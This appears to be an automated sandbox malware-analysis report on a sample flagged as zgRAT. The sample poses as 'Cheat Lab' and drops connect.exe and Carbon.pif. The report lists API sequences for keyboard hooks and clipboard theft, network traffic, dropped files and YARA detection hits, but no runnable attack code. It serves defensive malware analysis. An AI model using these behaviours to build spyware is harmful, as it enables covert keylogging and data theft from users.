                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000004.00000002.1808676606.0000022C41E42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: compiler.exe, 0000000B.00000000.1900902817.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://luajit.org/
                        Source: powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00408F95 SetWindowsHookExW 00000002,Function_00009F2A,00000000,0000000016_2_00408F95
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,29_2_0096F286
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,29_2_0096F4F1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,29_2_0096F286
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095A36F GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,29_2_0095A36F
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow created: window name: CLIPBRDWNDCLASS
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00989C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,29_2_00989C62

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        .NET source code contains very large array initializations
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                        Drops large PE files
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile dump: connect.exe.10.dr 1073657860Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090FFC0 NtResumeThread,29_2_0090FFC0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,29_2_0096448D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009518E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,29_2_009518E3
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095EF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,29_2_0095EF37
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6d055c.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI695.tmpJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B4047FA6_2_00007FFD9B4047FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B4D2E116_2_00007FFD9B4D2E11
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD7ABC811_2_00007FF7BAD7ABC8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC7B1C11_2_00007FF7BADC7B1C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD4BC7C11_2_00007FF7BAD4BC7C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC5C4411_2_00007FF7BADC5C44
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD62C2411_2_00007FF7BAD62C24
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD46A0411_2_00007FF7BAD46A04
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA39DC11_2_00007FF7BADA39DC
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADCC91811_2_00007FF7BADCC918
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD4693011_2_00007FF7BAD46930
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD4AAFC11_2_00007FF7BAD4AAFC
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD96B1011_2_00007FF7BAD96B10
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADCBA8411_2_00007FF7BADCBA84
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB5A6811_2_00007FF7BADB5A68
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADBAA1C11_2_00007FF7BADBAA1C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD6CF7011_2_00007FF7BAD6CF70
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9AF5411_2_00007FF7BAD9AF54
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD63F4811_2_00007FF7BAD63F48
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC0F4811_2_00007FF7BADC0F48
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC3F2011_2_00007FF7BADC3F20
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9610C11_2_00007FF7BAD9610C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD970E411_2_00007FF7BAD970E4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD880B811_2_00007FF7BAD880B8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADAA0C411_2_00007FF7BADAA0C4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD96DF011_2_00007FF7BAD96DF0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADBFDC011_2_00007FF7BADBFDC0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC9D9C11_2_00007FF7BADC9D9C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD6BD4811_2_00007FF7BAD6BD48
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA5D2011_2_00007FF7BADA5D20
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA3EE811_2_00007FF7BADA3EE8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC2E2C11_2_00007FF7BADC2E2C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB940811_2_00007FF7BADB9408
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC63A011_2_00007FF7BADC63A0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD973B011_2_00007FF7BAD973B0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9639011_2_00007FF7BAD96390
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8A33C11_2_00007FF7BAD8A33C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB435011_2_00007FF7BADB4350
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB44C811_2_00007FF7BADB44C8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD6442411_2_00007FF7BAD64424
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB242C11_2_00007FF7BADB242C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB211811_2_00007FF7BADB2118
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADAF12811_2_00007FF7BADAF128
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC412C11_2_00007FF7BADC412C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9B7F811_2_00007FF7BAD9B7F8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB67E011_2_00007FF7BADB67E0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA67E411_2_00007FF7BADA67E4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD617A411_2_00007FF7BAD617A4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADCB79411_2_00007FF7BADCB794
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA690011_2_00007FF7BADA6900
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB38E811_2_00007FF7BADB38E8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD428AC11_2_00007FF7BAD428AC
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9689411_2_00007FF7BAD96894
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD6587411_2_00007FF7BAD65874
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADBE5C011_2_00007FF7BADBE5C0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA65A811_2_00007FF7BADA65A8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD5D52011_2_00007FF7BAD5D520
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC353011_2_00007FF7BADC3530
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB353011_2_00007FF7BADB3530
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADBD70011_2_00007FF7BADBD700
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD5D71011_2_00007FF7BAD5D710
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADA66C411_2_00007FF7BADA66C4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC165811_2_00007FF7BADC1658
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD9662C11_2_00007FF7BAD9662C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8663011_2_00007FF7BAD86630
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0040ACC716_2_0040ACC7
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004066CF16_2_004066CF
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004140D916_2_004140D9
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0042414316_2_00424143
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004159AE16_2_004159AE
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00424AD116_2_00424AD1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041629116_2_00416291
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00413B1216_2_00413B12
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004133A716_2_004133A7
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00424BAB16_2_00424BAB
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00414BB116_2_00414BB1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0040DC4916_2_0040DC49
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004134E616_2_004134E6
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041654C16_2_0041654C
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00415D2016_2_00415D20
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00424E4316_2_00424E43
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004136AA16_2_004136AA
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00415FCA16_2_00415FCA
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F81B029_2_008F81B0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0091228229_2_00912282
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0092A23E29_2_0092A23E
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090C4DD29_2_0090C4DD
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0097C5CB29_2_0097C5CB
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008FE50D29_2_008FE50D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F869029_2_008F8690
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096272F29_2_0096272F
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0092E85229_2_0092E852
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095899129_2_00958991
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00926ABB29_2_00926ABB
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F8AF029_2_008F8AF0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090CC3E29_2_0090CC3E
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0091CDF029_2_0091CDF0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008FD08029_2_008FD080
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0098503329_2_00985033
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0092712929_2_00927129
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009116E429_2_009116E4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00911A5629_2_00911A56
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00909BAD29_2_00909BAD
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00917B6B29_2_00917B6B
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00917D9A29_2_00917D9A
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00911D0029_2_00911D00
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00911FC729_2_00911FC7
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00917FF729_2_00917FF7
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090DFFD29_2_0090DFFD
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019B0B9831_2_019B0B98
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019B091031_2_019B0910
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019B08FF31_2_019B08FF
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019B0B8831_2_019B0B88
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0590E94031_2_0590E940
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_059050B331_2_059050B3
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0590990031_2_05909900
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0590583031_2_05905830
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0590990031_2_05909900
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0590990031_2_05909900
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0595D0E831_2_0595D0E8
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0595004031_2_05950040
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_05954D0031_2_05954D00
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0595EB6031_2_0595EB60
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0595DD1831_2_0595DD18
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0596B31831_2_0596B318
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_059692C831_2_059692C8
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0596AED831_2_0596AED8
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_05966E2031_2_05966E20
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0596652831_2_05966528
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_059755A031_2_059755A0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0597559231_2_05975592
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0597000631_2_05970006
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_0597004031_2_05970040
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: String function: 00910D80 appears 46 times
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: String function: 0090FD18 appears 31 times
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0041A1B0 appears 31 times
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0040476F appears 50 times
                        Source: Dns.16.drStatic PE information: No import functions for PE file found
                        Source: Dns.16.drStatic PE information: Data appended to the last section found
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
